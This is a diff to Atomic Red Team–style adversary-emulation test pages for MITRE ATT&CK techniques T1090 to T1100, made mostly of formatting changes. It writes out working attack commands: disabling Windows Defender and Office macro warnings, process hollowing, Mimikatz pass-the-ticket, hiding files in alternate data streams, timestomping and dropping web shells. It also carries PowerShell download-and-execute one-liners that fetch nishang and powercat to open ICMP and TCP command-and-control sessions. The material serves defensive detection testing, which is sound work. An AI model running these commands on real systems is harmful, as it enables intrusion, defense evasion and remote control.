## Atomic Test #18 - Tamper with Windows Defender Registry -Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be + +Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and +Threat protection window in Settings will be grayed out and have no info. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 ``` #### Cleanup Commands: + ```powershell Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 ``` - - - -

## Atomic Test #19 - Disable Microft Office Security Features -Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not -show any warning before editing the document +Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will +not +show any warning before editing the document https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel" @@ -679,41 +567,31 @@ New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Prot ``` #### Cleanup Commands: + ```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" ``` - - - -

## Atomic Test #20 - Remove Windows Defender Definition Files -Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. -On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the + +Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all +arguments. +On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older +versions of windows the command will say completed. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1090.md b/Atomic_Threat_Coverage/Triggers/T1090.md index cded5228..981c6e7a 100644 --- a/Atomic_Threat_Coverage/Triggers/T1090.md +++ b/Atomic_Threat_Coverage/Triggers/T1090.md @@ -1,10 +1,20 @@ # T1090 - Connection Proxy + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1090) +
Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. -External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the internet and then the proxy would forward communications to the C2 server. +External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port +redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased +infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low +likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate +directly with the external proxy on the internet and then the proxy would forward communications to the C2 server. -Internal connection proxies can be used to consolidate internal connections from compromised systems. 
Adversaries may use a compromised internal system as a proxy in order to conceal the true destination of C2 traffic. The proxy can redirect traffic from compromised systems inside the network to an external C2 server making discovery of malicious traffic difficult. Additionally, the network can be used to relay information from one system to another in order to avoid broadcasting traffic to all systems.
+Internal connection proxies can be used to consolidate internal connections from compromised systems. Adversaries may +use a compromised internal system as a proxy in order to conceal the true destination of C2 traffic. The proxy can +redirect traffic from compromised systems inside the network to an external C2 server making discovery of malicious +traffic difficult. Additionally, the network can be used to relay information from one system to another in order to +avoid broadcasting traffic to all systems. ## Atomic Tests @@ -12,78 +22,66 @@ Internal connection proxies can be used to consolidate internal connections from - [Atomic Test #2 - portproxy reg key](#atomic-test-2---portproxy-reg-key) -
## Atomic Test #1 - Connection Proxy + Enable traffic redirection. Note that this test may conflict with pre-existing system configuration. **Supported Platforms:** macOS, Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080| | proxy_scheme | Protocol to proxy (http or https) | string | http| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh export #{proxy_scheme}_proxy=#{proxy_server} ``` #### Cleanup Commands: + ```sh unset http_proxy unset https_proxy ``` - - - -

## Atomic Test #2 - portproxy reg key -Adds a registry key to set up a proxy on the endpoint at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 + +Adds a registry key to set up a proxy on the endpoint at +HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 Upon execution there will be a new proxy entry in netsh netsh interface portproxy show all **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | listenport | Specifies the IPv4 port, by port number or service name, on which to listen. | string | 1337| | connectport | Specifies the IPv4 port, by port number or service name, to which to connect. If connectport is not specified, the default is the value of listenport on the local computer. | string | 1337| | connectaddress | Specifies the IPv4 address to which to connect. Acceptable values are IP address, computer NetBIOS name, or computer DNS name. If an address is not specified, the default is the local computer. | string | 127.0.0.1| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress} ``` #### Cleanup Commands: + ```powershell netsh interface portproxy delete v4tov4 listenport=#{listenport} ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1093.md b/Atomic_Threat_Coverage/Triggers/T1093.md index f42f40ae..2c6d05ca 100644 --- a/Atomic_Threat_Coverage/Triggers/T1093.md +++ b/Atomic_Threat_Coverage/Triggers/T1093.md @@ -1,24 +1,24 @@ # T1093 - Process Hollowing + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1093) +
Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis. (Citation: Leitch Hollowing) (Citation: Endgame Process Injection July 2017)
## Atomic Tests - [Atomic Test #1 - Process Hollowing using PowerShell](#atomic-test-1---process-hollowing-using-powershell) -
## Atomic Test #1 - Process Hollowing using PowerShell + This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent. Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1) **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | parent_process_name | Name of the parent process | string | explorer| @@ -26,9 +26,7 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/ | hollow_binary_path | Path of the binary to hollow (executable that will run inside the sponsor) | string | C:\Windows\System32\cmd.exe| | spawnto_process_name | Name of the process to spawn | string | calc| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell . $PathToAtomicsFolder\T1093\src\Start-Hollow.ps1 @@ -37,12 +35,9 @@ Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" - ``` #### Cleanup Commands: + ```powershell Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1095.md b/Atomic_Threat_Coverage/Triggers/T1095.md index f5a66b40..d73a3301 100644 --- a/Atomic_Threat_Coverage/Triggers/T1095.md +++ b/Atomic_Threat_Coverage/Triggers/T1095.md @@ -1,8 +1,12 @@ # T1095 - Standard Non-Application Layer Protocol + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1095) +
Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. (Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). -ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
+ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to +be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other +Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications. ## Atomic Tests @@ -12,51 +16,41 @@ ICMP communication between hosts is one example. Because ICMP is part of the Int - [Atomic Test #3 - Powercat C2](#atomic-test-3---powercat-c2) -
## Atomic Test #1 - ICMP C2 -This will attempt to start C2 Session Using ICMP. For information on how to set up the listener + +This will attempt to start C2 Session Using ICMP. For information on how to set up the listener refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/ **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | server_ip | The IP address of the listening server | string | 127.0.0.1| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1') Invoke-PowerShellIcmp -IPAddress #{server_ip} ``` - - - - -

## Atomic Test #2 - Netcat C2 + Start C2 Session Using Ncat -To start the listener on a Linux device, type the following: +To start the listener on a Linux device, type the following: nc -l -p **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | server_ip | The IP address or domain name of the listening server | string | 127.0.0.1| @@ -64,24 +58,24 @@ nc -l -p | ncat_exe | The location of ncat.exe | path | $env:TEMP\T1095\nmap-7.80\ncat.exe| | ncat_path | The folder path of ncat.exe | path | $env:TEMP\T1095| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell cmd /c #{ncat_exe} #{server_ip} #{server_port} ``` - - - #### Dependencies: Run with `powerShell`! + ##### Description: ncat.exe must be available at specified location (#{ncat_exe}) + ##### Check Prereq Commands: + ```powerShell if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powerShell New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null $parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip" @@ -93,40 +87,29 @@ if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\ } ``` - - -

## Atomic Test #3 - Powercat C2 + Start C2 Session Using Powercat -To start the listener on a Linux device, type the following: +To start the listener on a Linux device, type the following: nc -l -p **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | server_ip | The IP address or domain name of the listening server | string | 127.0.0.1| | server_port | The port for the C2 connection | integer | 80| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1') powercat -c #{server_ip} -p #{server_port} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1096.md b/Atomic_Threat_Coverage/Triggers/T1096.md index fae1565d..022524f8 100644 --- a/Atomic_Threat_Coverage/Triggers/T1096.md +++ b/Atomic_Threat_Coverage/Triggers/T1096.md @@ -1,8 +1,12 @@ # T1096 - NTFS File Attributes + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1096) +
Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014) -Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)
+Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be +done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR +ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015) ## Atomic Tests @@ -10,10 +14,10 @@ Adversaries may store malicious data or binaries in file attribute metadata inst - [Atomic Test #2 - Store file in Alternate Data Stream (ADS)](#atomic-test-2---store-file-in-alternate-data-stream-ads) -
## Atomic Test #1 - Alternate Data Streams (ADS) + Execute from Alternate Streams [Reference - 1](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f) @@ -22,17 +26,13 @@ Execute from Alternate Streams **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | path | Path of ADS file | path | c:\ADS\| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" @@ -47,33 +47,25 @@ expand \\webdav\folder\file.bat #{path}\file.txt:file.bat esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o ``` - - - - -

## Atomic Test #2 - Store file in Alternate Data Stream (ADS) + Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | payload_path | Path of file to hide in ADS | path | c:\windows\system32\cmd.exe| | ads_file_path | Path of file to create an ADS under | path | C:\Users\Public\Libraries\yanki\desktop.ini| | ads_name | Name of ADS | string | desktop.ini| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell if (!(Test-Path C:\Users\Public\Libraries\yanki -PathType Container)) { @@ -83,12 +75,9 @@ Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>, ``` #### Cleanup Commands: + ```powershell Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1097.md b/Atomic_Threat_Coverage/Triggers/T1097.md index 2785fca4..eb4cf673 100644 --- a/Atomic_Threat_Coverage/Triggers/T1097.md +++ b/Atomic_Threat_Coverage/Triggers/T1097.md @@ -1,45 +1,45 @@ # T1097 - Pass the Ticket + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1097) +
Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system. -In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access. (Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket) +In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured +by [Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket ( +TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, +whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the +user has privileges to access. (Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket) -Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: ADSecurity AD Kerberos Attacks) +Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate +tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). 
(Citation: +ADSecurity AD Kerberos Attacks) -Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014)
+Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which +enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014) ## Atomic Tests - [Atomic Test #1 - Mimikatz Kerberos Ticket Attack](#atomic-test-1---mimikatz-kerberos-ticket-attack) -
## Atomic Test #1 - Mimikatz Kerberos Ticket Attack + Similar to PTH, but attacking Kerberos **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username | string | Administrator| | domain | domain | string | atomic.local| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd mimikatz # kerberos::ptt #{user_name}@#{domain} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1098.md b/Atomic_Threat_Coverage/Triggers/T1098.md
index 60057fc2..e9da869e 100644
--- a/Atomic_Threat_Coverage/Triggers/T1098.md
+++ b/Atomic_Threat_Coverage/Triggers/T1098.md
@@ -1,37 +1,43 @@ # T1098 - Account Manipulation + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1098) +
Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to subvert password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. ### Exchange Email Account Takeover -The Add-MailboxPermission PowerShell cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission) This command can be run, given adequate permissions, to further access granted to certain user accounts. This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019) +The Add-MailboxPermission PowerShell cmdlet, available in on-premises Exchange and in the cloud-based service Office +365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission) This command can be run, given adequate +permissions, to further access granted to certain user accounts. 
This may be used in persistent threat incidents as well +as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish +to compromise. This may further enable use of additional techniques for gaining access to systems. For example, +compromised business accounts are often used to send messages to other accounts in the network of the target business +while creating inbox rules so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending +O365 - 2019) ### Azure AD -In Azure, an adversary can set a second password for Service Principals, facilitating persistence.(Citation: Blue Cloud of Death) +In Azure, an adversary can set a second password for Service Principals, facilitating persistence.(Citation: Blue Cloud +of Death) ### AWS -AWS policies allow trust between accounts by simply identifying the account name. It is then up to the trusted account to only allow the correct roles to have access.(Citation: Summit Route Advanced AWS policy auditing)
+AWS policies allow trust between accounts by simply identifying the account name. It is then up to the trusted account +to only allow the correct roles to have access.(Citation: Summit Route Advanced AWS policy auditing) ## Atomic Tests - [Atomic Test #1 - Admin Account Manipulate](#atomic-test-1---admin-account-manipulate) -
## Atomic Test #1 - Admin Account Manipulate + Manipulate Admin Account Name **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $x = Get-Random -Minimum 2 -Maximum 9999 @@ -52,9 +58,4 @@ foreach($member in $fmm) { } ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1099.md b/Atomic_Threat_Coverage/Triggers/T1099.md
index 51d15941..9db81ce5 100644
--- a/Atomic_Threat_Coverage/Triggers/T1099.md
+++ b/Atomic_Threat_Coverage/Triggers/T1099.md
@@ -1,5 +1,7 @@ # T1099 - Timestomp + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1099) +
Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)
## Atomic Tests
@@ -18,68 +20,52 @@ - [Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell](#atomic-test-7---windows---modify-file-last-access-timestamp-with-powershell) -
## Atomic Test #1 - Set a file's access timestamp + Stomps on the access timestamp of a file **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh touch -a -t 197001010000.00 #{target_filename} ``` - - - - -

## Atomic Test #2 - Set a file's modification timestamp + Stomps on the modification timestamp of a file **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh touch -m -t 197001010000.00 #{target_filename} ``` - - - - -

## Atomic Test #3 - Set a file's creation timestamp + Stomps on the create timestamp of a file Setting the creation timestamp requires changing the system clock and reverting. @@ -87,17 +73,13 @@ Sudo or root privileges are required to change date. Use with caution. **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh NOW=$(date) @@ -107,185 +89,169 @@ date -s "$NOW" stat #{target_filename} ``` - - - - -

## Atomic Test #4 - Modify file timestamps using reference file + Modifies the `modify` and `access` timestamps using the timestamps of a specified reference file. This technique was used by the threat actor Rocke during the compromise of Linux web servers. **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | reference_file_path | Path of reference file to read timestamps from | Path | /bin/sh| | target_file_path | Path of file to modify timestamps of | Path | /opt/filename| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh touch -acmr #{reference_file_path} #{target_file_path} ``` - - - - -

## Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell + Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT. -To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970. +To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year +1970. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | Path of file to change creation timestamp | Path | $env:TEMP\T1099_timestomp.txt| | target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" } ``` #### Cleanup Commands: + ```powershell Remove-Item #{file_path} -Force -ErrorAction Ignore ``` - - #### Dependencies: Run with `powershell`! + ##### Description: A file must exist at the path (#{file_path}) to change the creation time on + ##### Check Prereq Commands: + ```powershell if (Test-Path #{file_path}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null ``` - - -

## Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell + Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT. -To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970. +To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year +1970. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | Path of file to change modified timestamp | Path | $env:TEMP\T1099_timestomp.txt| | target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" } ``` #### Cleanup Commands: + ```powershell Remove-Item #{file_path} -Force -ErrorAction Ignore ``` - - #### Dependencies: Run with `powershell`! + ##### Description: A file must exist at the path (#{file_path}) to change the modified time on + ##### Check Prereq Commands: + ```powershell if (Test-Path #{file_path}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null ``` - - -

## Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell + Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT. -To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970. +To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year +1970. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | Path of file to change last access timestamp | Path | $env:TEMP\T1099_timestomp.txt| | target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" } ``` #### Cleanup Commands: + ```powershell Remove-Item #{file_path} -Force -ErrorAction Ignore ``` - - #### Dependencies: Run with `powershell`! + ##### Description: A file must exist at the path (#{file_path}) to change the last access time on + ##### Check Prereq Commands: + ```powershell if (Test-Path #{file_path}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1100.md b/Atomic_Threat_Coverage/Triggers/T1100.md
index e19e7b50..64e04b52 100644
--- a/Atomic_Threat_Coverage/Triggers/T1100.md
+++ b/Atomic_Threat_Coverage/Triggers/T1100.md
@@ -1,54 +1,57 @@ # T1100 - Web Shell + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1100) +
A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013) -Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.
+Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in +case an adversary's primary access methods are detected and removed. ## Atomic Tests - [Atomic Test #1 - Web Shell Written to Disk](#atomic-test-1---web-shell-written-to-disk) -
## Atomic Test #1 - Web Shell Written to Disk + This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | web_shell_path | The path to drop the web shell | string | C:\inetpub\wwwroot| | web_shells | Path of Web Shell | path | PathToAtomicsFolder\T1100\src\| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd xcopy #{web_shells} #{web_shell_path} ``` #### Cleanup Commands: + ```cmd del #{web_shell_path} >nul 2>&1 ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Web shell must exist on disk at specified location (#{web_shells}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{web_shells}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/b.jsp" -OutFile "#{web_shells}/b.jsp" @@ -56,7 +59,4 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" ``` - - -
